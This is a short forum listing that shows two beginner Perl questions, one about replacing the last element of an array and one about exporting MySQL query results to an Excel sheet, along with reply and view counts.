Member Avatar for bigfoot_80906

Is there a command in Perl that will strip off the last element in an array and replace it with a constant value?

Member Avatar for RBBD
0
220
Member Avatar for venkateshvpro

Hello, I need help to write a perl script for read a data from Mysql Database using mysql query and write it into excel sheet.. Can you help me....?

Member Avatar for mitchems
0
81

The End.